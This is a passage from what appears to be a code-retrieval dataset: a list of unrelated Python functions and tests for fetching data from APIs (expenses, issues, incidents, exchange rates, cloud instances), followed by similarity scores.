price_response", "def get_epic_children(self) -> list:\n\n children = [i['key'] for i in self.repo.api_call(requests.get, f\"search?jql=cf[10008]='{self.jira_key}'\")['issues']]\n return children", "def __getLuredExpInfo(self, suitId):\n returnInfo = []\n lurers = self.__getLurers(suitId)\n if len(lurers) == 0:\n return returnInfo\n lurerInfo = self.currentlyLuredSuits[suitId][3]\n for currLurer in lurers:\n returnInfo.append([currLurer,\n lurerInfo[currLurer][0],\n lurerInfo[currLurer][1],\n lurerInfo[currLurer][2],\n ])\n return returnInfo", "def get(self, updated_at=None, settled_at=None, reimbursed_at=None, approved_at=None, state=None, offset=None,\n verified=None, limit=None, fund_source=None, settlement_id=None):\n return self._get_request({\n 'updated_at': updated_at,\n 'offset': offset,\n 'limit': limit,\n 'settled_at': settled_at,\n 'reimbursed_at': reimbursed_at,\n 'approved_at': approved_at,\n 'state': state,\n 'verified': verified,\n 'fund_source': fund_source,\n 'settlement_id': settlement_id\n }, Expenses.GET_EXPENSES)", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def test_get_historical_prices(self, mock_requests_get):\n from grand_exchanger.resources.graph import Graph\n\n result = resources.get_historical_prices(1)\n\n assert result == Graph(\n daily={\n datetime(2020, 7, 27, 0, 0): 100,\n datetime(2020, 7, 26, 0, 0): 120,\n datetime(2020, 7, 25, 0, 0): 110,\n },\n average={\n datetime(2020, 7, 27, 0, 0): 100,\n datetime(2020, 7, 26, 0, 0): 110,\n datetime(2020, 7, 25, 0, 0): 104,\n },\n )", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def test_get_urls(self):\r\n OFFER_URLS = [\"http://olx.pl/offer1\",\r\n \"http://olx.pl/offer2\",\r\n \"http://olx.pl/offer3\",\r\n \"http://olx.pl/offer4\",\r\n \"http://olx.pl/offer5\",\r\n \"http://olx.pl/offer6\"]\r\n\r\n SEARCH_QUERY = \"http://SEARCH_QUERY_URL?\"\r\n \r\n for url in OfferSearcher.search(SEARCH_QUERY, 6, WebDocumentFetcherStub):\r\n self.assertTrue(url in OFFER_URLS, \"Unexpected offer url fetched: %s\" % url)\r\n OFFER_URLS.remove(url)\r\n \r\n self.assertEquals(0, len(OFFER_URLS), \"Not all offer urls fetched: %s\" % OFFER_URLS)", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def fetch_and_store_latest_ecb_exrates():\n response = requests.get(DAILY_ECB_URL)\n # Raise exception if status_code != 200 or ConnectionError\n response.raise_for_status()\n info = ET.fromstring(response.content)[2][0]\n datestamp = datetime.strptime(info.attrib['time'], \"%Y-%m-%d\").date()\n rates = [x.attrib for x in info]\n\n exrates = []\n for item in rates:\n if item['currency'] in SUPPORTED_CURRENCIES:\n exrate, created = ExchangeRate.objects.update_or_create(\n datestamp=datestamp,\n currency=item['currency'],\n defaults={'rate': Decimal(item['rate'])}\n )\n exrates.append(exrate)\n print(exrate, \"NEW EXRATE!\" if created else \"<noupdate>\")\n\n return exrates", "def getExpires(self):\n return self.base.get(\"expires\", [])", "def get_objectives(data):\n objectives = [math.log(population[0][\"objective\"]) for population in data]\n # objectives = [population[0][\"objective\"] for population in data]\n return objectives", "async def get_invites(self) -> 'typing.List[dt_invite.Invite]':\n invites = await self._bot.http.get_invites_for(self.id)\n invites = [dt_invite.Invite(self._bot, **i) for i in invites]\n\n try:\n invite = await self.get_vanity_invite()\n except (CuriousError, HTTPException):\n pass\n else:\n if invite is not None:\n invites.append(invite)\n\n return invites", "def test_codigo_exp(self):\n response = self.client.get('/apirest/expedientes/?codigoExp=0019-JGM-2014')\n self.assertEqual(response.status_code, self.CODIGO_EXITO)\n self.assertEqual(response.data[\"count\"], 1)\n self.assertEqual(response.data[\"results\"][0][\"tipocamara\"], self.TIPO_CAMARA)\n self.assertEqual(response.data[\"results\"][0][\"voces\"], self.RANGO_FECHAS_VOCES)", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "async def get_issues(self) -> [\"AIOGitHubAPIRepositoryIssue\"]:\n _endpoint = f\"/repos/{self.full_name}/issues\"\n\n response = await self.client.get(endpoint=_endpoint)\n return [AIOGitHubAPIRepositoryIssue(self.client, x) for x in response or []]", "def get_expense(self, resp):\n expense = resp['expense']\n expense_obj = Expense()\n expense_obj.set_expense_id(expense['expense_id'])\n expense_obj.set_expense_item_id(expense['expense_item_id'])\n expense_obj.set_account_id(expense['account_id'])\n expense_obj.set_account_name(expense['account_name'])\n expense_obj.set_paid_through_account_id(expense[\\\n 'paid_through_account_id'])\n expense_obj.set_paid_through_account_name(expense[\\\n 'paid_through_account_name'])\n expense_obj.set_vendor_id(expense['vendor_id'])\n expense_obj.set_vendor_name(expense['vendor_name'])\n expense_obj.set_date(expense['date'])\n expense_obj.set_tax_id(expense['tax_id'])\n expense_obj.set_tax_name(expense['tax_name'])\n expense_obj.set_tax_percentage(expense['tax_percentage'])\n expense_obj.set_currency_id(expense['currency_id'])\n expense_obj.set_currency_code(expense['currency_code'])\n expense_obj.set_exchange_rate(expense['exchange_rate'])\n expense_obj.set_tax_amount(expense['tax_amount'])\n expense_obj.set_sub_total(expense['sub_total'])\n expense_obj.set_total(expense['total'])\n expense_obj.set_bcy_total(expense['bcy_total'])\n expense_obj.set_amount(expense['amount'])\n expense_obj.set_is_inclusive_tax(expense['is_inclusive_tax'])\n expense_obj.set_reference_number(expense['reference_number'])\n expense_obj.set_description(expense['description'])\n expense_obj.set_is_billable(expense['is_billable'])\n expense_obj.set_customer_id(expense['customer_id'])\n expense_obj.set_customer_name(expense['customer_name'])\n expense_obj.set_expense_receipt_name(expense['expense_receipt_name'])\n expense_obj.set_created_time(expense['created_time'])\n expense_obj.set_last_modified_time(expense['last_modified_time'])\n expense_obj.set_status(expense['status'])\n expense_obj.set_invoice_id(expense['invoice_id'])\n expense_obj.set_invoice_number(expense['invoice_number'])\n expense_obj.set_project_id(expense['project_id'])\n expense_obj.set_project_name(expense['project_name'])\n return expense_obj", "def scrape_issues(self, url):\n try:\n self.driver.get(url)\n except common.exceptions.InvalidSessionIdException:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n except Exception:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n buganizer_issues = []\n\n if \"Buganizer\" not in page_title or \"componentid\" not in page_title:\n if \"MOMA Single Sign On\" in page_title:\n error_message = \"ERROR: You must log into your MOMA account \"\\\n \"first. Select the 'Use Security Code' option and generate a security code at go/sc.\\n\"\n self.logger.log(error_message)\n\n while \"Buganizer\" not in page_title:\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n time.sleep(1)\n\n return buganizer_issues\n error_message = \"ERROR: URL does not link to a Buganizer \"\\\n \"componentid, check specified URL \"\\\n \"in constants.py\\n\"\n self.logger.log(error_message)\n return buganizer_issues\n\n for tbody in soup.find_all('tbody'):\n for _tr in tbody.find_all('tr'):\n issue_link = \"https://b.corp.google.com/issues/\" + _tr.get(\n 'data-row-id')\n buganizer_issues.append(issue_link)\n return buganizer_issues", "def get_employees(self):\n return self.employees", "async def get_ff_emotes():\n\n redis = await aioredis.create_redis_pool(REDIS)\n value = await redis.hgetall(\"ff_emotes\", encoding=\"utf-8\")\n\n redis.close()\n await redis.wait_closed()\n return value;", "def get_haberes_exentos(self):\n return float(\n self.input.get_text(liquidaciones_historicas_catalog.HABERES_EXENTOS).replace(\".\", \"\").replace(\",\", \".\"))", "def fetch_alerts_related_incident(client: Client, incident_id: str, max_alerts: int) -> list[dict[str, Any]]:\n alerts: list[dict] = []\n has_next = True\n page_number = 0\n while has_next and len(alerts) < max_alerts:\n demisto.debug(f\"fetching alerts, {page_number=}\")\n try:\n response_body = client.incident_list_alerts_request(\n page_number=str(page_number),\n id_=incident_id,\n page_size=None\n )\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 429:\n raise DemistoException(\n 'Too many requests, try later or reduce the number of Fetch Limit parameter.'\n ) from e\n raise e\n\n except Exception:\n demisto.error(f\"Error occurred while fetching alerts related to {incident_id=}. {page_number=}\")\n raise\n\n items = response_body.get('items', [])\n alerts.extend(items[:max_alerts - len(alerts)])\n page_number += 1\n has_next = response_body.get('hasNext', False)\n\n return alerts", "def get_list_of_results(url, regex, max_retries=10, auth=('', '')):\n resultslist = []\n for _ in range(max_retries):\n page = requests.get(url, auth=auth)\n if not page.status_code==200:\n time.sleep(5)\n continue\n else:\n break\n if not regex is None:\n for m in re.finditer(regex, str(page.content)):\n resultslist.append(m.group(1))\n else:\n resultslist = page.text.split(\"\\n\")\n resultslist = list(filter(None, resultslist))\n return resultslist, len(resultslist)", "def get(self, expense_id):\n url = base_url + expense_id\n resp = zoho_http_client.get(url, self.details, self.headers)\n return parser.get_expense(resp)", "def get_experience(self):\n return self.experience_set.all()", "def test_url_risklist_gzip(self):\n client = ConnectApiClient()\n resp = client.get_url_risklist(gzip=True)\n buf = io.BytesIO()\n for itr in resp.iter_content(chunk_size=1024):\n buf.write(itr)\n buf.seek(0)\n self.assertGreater(len(buf.read()), 1000)\n buf.close()", "def get_incidents(self) -> tuple[list[Any], Any, Any | None]:\n timestamp = None\n fetch_limit = arg_to_number(self.fetch_limit)\n fetch_time = self.fetch_time\n if not fetch_limit or not fetch_time:\n raise DemistoException('Missing parameter - fetch limit or fetch time')\n last_run = demisto.getLastRun()\n if last_run and last_run.get('timestamp'):\n timestamp = last_run.get('timestamp', '')\n last_fetched_ids = last_run.get('last_fetched_ids', [])\n else:\n if last_fetch := arg_to_datetime(fetch_time, required=True):\n # convert to ISO 8601 format and add Z suffix\n timestamp = last_fetch.strftime(DATE_FORMAT)\n last_fetched_ids = []\n\n page_size = '100'\n # set the until argument to prevent duplicates\n until = get_now_time()\n response = self.list_incidents_request(page_size, '0', until, timestamp)\n if not response.get('items'):\n return [], last_fetched_ids, timestamp\n\n page_number = response.get('totalPages', 1) - 1\n total = 0\n total_items: list[dict] = []\n while total < fetch_limit and page_number >= 0:\n try:\n response = self.list_incidents_request(page_size, page_number, until, timestamp)\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 429:\n raise DemistoException(\n 'Too many requests, try later or reduce the number of Fetch Limit parameter.'\n ) from e\n raise e\n\n items = response.get('items', [])\n new_items = remove_duplicates_for_fetch(items, last_fetched_ids)\n # items order is from old to new , add new items at the start of list to maintain order\n total_items = new_items + total_items\n total += len(new_items)\n page_number -= 1\n\n # bring the last 'fetch_limit' items, as order is reversed\n total_items = total_items[len(total_items) - fetch_limit:]\n return total_items, last_fetched_ids, timestamp", "def fetch(prom_url, query_expr):\n\n global scrape_timestamp\n scrape_timestamp = int(datetime.now(tz=timezone.utc).timestamp() * 1000)\n\n response = requests.get(prom_url, params={ 'query': query_expr })\n results = response.json()['data']['result']\n\n return results", "def get_incidents_for_alert(**kwargs) -> list:\n incidents: List[Dict[str, Any]] = []\n\n headers = {\n 'X-FeApi-Token': kwargs['client'].get_api_token(),\n 'Accept': CONTENT_TYPE_JSON,\n }\n\n params = {\n 'start_time': time.strftime(\n API_SUPPORT_DATE_FORMAT, time.localtime(kwargs['start_time'])\n ),\n 'duration': '48_hours',\n }\n\n if kwargs['malware_type']:\n params['malware_type'] = kwargs['malware_type']\n\n # http call\n resp = kwargs['client'].http_request(\n method='GET',\n url_suffix=URL_SUFFIX['GET_ALERTS'],\n params=params,\n headers=headers,\n )\n\n total_records = resp.get('alertsCount', 0)\n if total_records > 0:\n\n if kwargs['replace_alert_url']:\n replace_alert_url_key_domain_to_instance_url(\n resp.get('alert', []), kwargs['instance_url']\n )\n\n count = kwargs['fetch_count']\n for alert in resp.get('alert', []):\n # set incident\n context_alert = remove_empty_entities(alert)\n context_alert['incidentType'] = ALERT_INCIDENT_TYPE\n if count >= kwargs['fetch_limit']:\n break\n\n occurred_date = dateparser.parse(context_alert.get('occurred', ''))\n assert occurred_date is not None\n incident = {\n 'name': context_alert.get('name', ''),\n 'occurred': occurred_date.strftime(\n DATE_FORMAT_WITH_MICROSECOND\n ),\n 'rawJSON': json.dumps(context_alert),\n }\n\n if (\n not kwargs['is_test']\n and alert.get('uuid', '')\n and kwargs['fetch_artifacts']\n ):\n set_attachment_file(\n client=kwargs['client'],\n incident=incident,\n uuid=alert.get('uuid', ''),\n headers=headers,\n )\n\n remove_nulls_from_dictionary(incident)\n incidents.append(incident)\n count += 1\n return incidents", "def get_alarms(username, auth, url):\n f_url = url + \"/imcrs/fault/alarm?operatorName=\" + username + \\\n \"&recStatus=0&ackStatus=0&timeRange=0&size=50&desc=true\"\n response = requests.get(f_url, auth=auth, headers=HEADERS)\n try:\n if response.status_code == 200:\n alarm_list = (json.loads(response.text))\n return alarm_list['alarm']\n except requests.exceptions.RequestException as error:\n return \"Error:\\n\" + str(error) + ' get_alarms: An Error has occured'", "def get_episode_list(self):\n if self.episodes is not None:\n return self.episodes\n\n self.episodes = []\n\n # Now before we return pre-emptively fetch the episode list.\n # XXX We _could_ put this in a 'get_episode_list' method that does the\n # fetching then.. but for now we are just going to have it done\n # here.\n #\n if len(self.episode_guide_urls) == 0:\n return self.episodes\n\n for url in self.episode_guide_urls:\n url_data = url.get()\n\n # Now we run the GetEpisodeList rules on this data that\n # we just retrieved.\n #\n self.scraper.parser.set_buffer(1, url_data)\n self.scraper.parser.set_buffer(2, url.url)\n\n # This gets us a XML string with the list of episodes in it.\n # parse this in to a dom and then go through each <episode>\n # element creating an Episode object to append to our episode\n # list\n ep_list_result = self.scraper.parser.parse(FN_GET_EPISODE_LIST,\n self.scraper.settings)\n dom = parseString(ep_list_result)\n eps = dom.firstChild\n ep = first_child(eps, \"episode\")\n while ep:\n self.episodes.append(Episode(ep, self, self.scraper))\n ep = next_sibling(ep, \"episode\")\n dom.unlink()\n dom = None\n \n return self.episodes", "def get_prices(self):\n price = self.get_price()\n if price:\n return [price]\n return []", "def get(self, url_to_get=None): # pylint: disable=too-many-branches\n\n next_url = None\n if not url_to_get:\n url_to_get = self.url_to_get\n\n if self.etags and url_to_get in self.etags:\n self.headers[\"If-None-Match\"] = self.etags[url_to_get]\n\n req = get(url_to_get, headers=self.headers)\n\n if req.status_code == 200:\n data = req.json()\n repos = []\n\n if \"Etag\" in req.headers:\n self.etags[url_to_get] = req.headers[\"Etag\"]\n Helpers.Dict(self.etags).to_json(Settings.etags_file)\n\n if isinstance(data, list):\n repos.extend(data)\n else:\n raise Exception(\n \"Unable to understand GitHub API response for: '%s'.\" % url_to_get\n )\n\n if \"Link\" in req.headers:\n next_url = Helpers.Regex(\n req.headers[\"Link\"], self.regex_next_url, group=1, return_data=True\n ).match()\n\n if next_url:\n for element in self.get(url_to_get=next_url):\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n if repos:\n for element in repos:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n elif req.status_code == 304:\n data = Helpers.Dict.from_json(\n Helpers.File(Settings.repositories_file).read()\n )\n\n for element in data:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n elif req.status_code == 401:\n raise Exception(\"Bad GitHub credentials.\")\n else:\n raise Exception(\n \"Somethign went wrong while communicating with: '%s'.\" % url_to_get\n )", "def test_listar_expedientes_grado(self):\n self.assertNotEqual(self.almacen.listar_expedientes_grado(self.grado_valido), None)", "def get_exptimes( self ):\n return np.array([h['EXPTIME'] for h in self.headers])", "def retrieve_open_issues(self):\n return self._retrieve_issues(\"open\")", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def getEmployees(self):\n return self.employees", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def get_prices(self):\n pass", "def get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def _get_data_in_api(url: str) -> list:\n\n try:\n resp = requests.request('GET', url, timeout=10)\n resp.raise_for_status\n\n return Froxy._data_filter(resp.text)\n\n except (\n requests.ConnectionError,\n requests.ConnectTimeout,\n requests.HTTPError,\n requests.ReadTimeout\n ) as err:\n sys.exit(err)", "def fetch_instances(self, ids):\n result = []\n self.log.info(f\"fetch '{len(ids)}' instances\")\n self.log.debug(f\"fetch instance data for ids '{ids}'\")\n try:\n response = self.client.describe_instances(\n InstanceIds=ids\n )\n if 'HTTPStatusCode' in response['ResponseMetadata'] and response['ResponseMetadata']['HTTPStatusCode'] == 200:\n pass\n else:\n raise Exception(f'not able to fetch instacnes with ids: {ids}')\n if len(response['Reservations'][0]['Instances']) == 0:\n raise Exception(f'should retrun at least single insatance data')\n result = []\n for reservation in response[\"Reservations\"]:\n for el in reservation[\"Instances\"]:\n ec2 = EC2Instance.factory(el)\n if ec2.state:\n result.append(ec2)\n else:\n self.log.warn(f'instance \"{ec2.id}\" excluded')\n except Exception as e:\n raise Exception(f'exception when trying to fetch instance data {ids}')\n return sorted(list(result), key=lambda instance: instance.launch_time)", "def _get_images(self, fuzzable_request):\n res = []\n\n try:\n response = self._uri_opener.GET(fuzzable_request.get_uri(),\n cache=False)\n except:\n om.out.debug('Failed to retrieve the page for finding captchas.')\n else:\n # Do not use parser_cache here, it's not good since CAPTCHA implementations\n # *might* change the image name for each request of the HTML\n #dp = parser_cache.dpc.get_document_parser_for( response )\n try:\n document_parser = DocumentParser.DocumentParser(response)\n except BaseFrameworkException:\n return []\n \n image_path_list = document_parser.get_references_of_tag('img')\n\n GET = self._uri_opener.GET\n sha1 = hashlib.sha1\n \n result_iter = self.worker_pool.imap_unordered(GET, image_path_list)\n \n for image_response in result_iter:\n if image_response.is_image():\n img_src = image_response.get_uri()\n img_hash = sha1(image_response.get_body()).hexdigest()\n res.append((img_src, img_hash, response))\n\n return res", "def test_find_disputes(self):\n query_string = [('limit', 100),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('dispute_reason', DisputeCode()),\n ('dispute_status', DisputeStatus()),\n ('beginning_date', 'beginning_date_example'),\n ('ending_date', 'ending_date_example')]\n response = self.client.open(\n '/paySmart/ps-processadora/v1/disputes',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def gethistory(itemID):\n\n return harvest(GET_HISTORIC_VALUE_URL, itemID)", "def get_exercises():\n email = session.get(\"email\")\n tag_arg = request.args.get(\"tag\")\n exercises = fm.get_all_exercises(email, tag_arg)\n msg = \"Found {} exercises for {}\".format(len(exercises), email)\n app.logger.info(msg)\n return jsonify(dict(exercises=exercises))", "def test_get_all_upcoming_expenses(self):\n print()\n print(\"Get all expenses will still occur\")\n user = CustomUser.objects.get(username = \"Test User\")\n actual_result = get_all_upcoming_budget_expenses(user = user)\n for ele in actual_result:\n print(ele)\n expected_result = [ BudgetExpense.objects.get(id=100),\n BudgetExpense.objects.get(id=150), \n BudgetExpense.objects.get(id=200), \n BudgetExpense.objects.get(id=600), \n BudgetExpense.objects.get(id=700),\n BudgetExpense.objects.get(id=500),\n BudgetExpense.objects.get(id=800)]\n print(\"====================\")\n print()\n self.assertEquals(expected_result, list(actual_result))" ]
[ "0.6731509", "0.6563917", "0.6551571", "0.63968503", "0.63752097", "0.5857632", "0.57382774", "0.5567012", "0.54315007", "0.54032236", "0.5390805", "0.53766435", "0.52719086", "0.52510387", "0.52280146", "0.52221656", "0.5203557", "0.5185477", "0.5180662", "0.5156471", "0.5141725", "0.5137997", "0.5133569", "0.51140064", "0.51082355", "0.5100608", "0.5095252", "0.5072092", "0.50504905", "0.49986422", "0.49618915", "0.49467337", "0.49392715", "0.49346536", "0.49121088", "0.49083567", "0.49002242", "0.49002242", "0.48952302", "0.4888357", "0.48876184", "0.48798832", "0.48549452", "0.48403662", "0.48354626", "0.4831559", "0.48279038", "0.48221853", "0.47903952", "0.4774124", "0.47710145", "0.47446805", "0.47429952", "0.47410995", "0.4738341", "0.47331548", "0.4726234", "0.4725938", "0.47174144", "0.47141108", "0.46995685", "0.46820635", "0.46765277", "0.46711636", "0.46690285", "0.46651393", "0.46568802", "0.46566218", "0.4649514", "0.46432486", "0.46365905", "0.46350834", "0.46262354", "0.46207651", "0.4615033", "0.46000478", "0.45980048", "0.45888168", "0.45876792", "0.4586843", "0.45861524", "0.4584878", "0.45802736", "0.4574077", "0.45716894", "0.45698923", "0.4568519", "0.45667434", "0.45637128", "0.45625764", "0.4557414", "0.4553826", "0.45350948", "0.4531048", "0.45252067", "0.45219463", "0.452079", "0.45204395", "0.45201847", "0.4516419" ]
0.7531671
0
fetcher.get_explores() should be able to filter on model and/or explore.
def test_get_explores_filters(fc: fetcher.Fetcher): explores = fc.get_explores(model="henry_dusty") assert all(e.model_name == "henry_dusty" for e in explores) explores = fc.get_explores(model="henry_qa", explore="explore_2_joins_all_used") assert all( e.model_name == "henry_qa" and e.name == "explore_2_joins_all_used" for e in explores )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explores_throws_if_model_or_explore_does_not_exist(\n fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_explores(model=model, explore=explore)\n assert msg in str(exc.value)", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def get_queryset(self):\n user = self.request.user\n expenses = Expense.objects.filter(\n Q(userexpense__in=user.userexpense_set.all())\n | Q(group__in=user.group_set.all()))\n\n if self.request.query_params.get('q', None) is not None:\n expenses = expenses.filter(\n description__icontains=self.request.query_params.get(\n 'q', None))\n return expenses", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def refresh_index_page_filter_by(request, exposure_sequence):", "def explore_view(request):\r\n # explore items\r\n user = request.user.userprofile\r\n items = Item.objects.explore(user)\r\n context = {'items':items}\r\n return render(request, 'explore/explore.html', context)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = 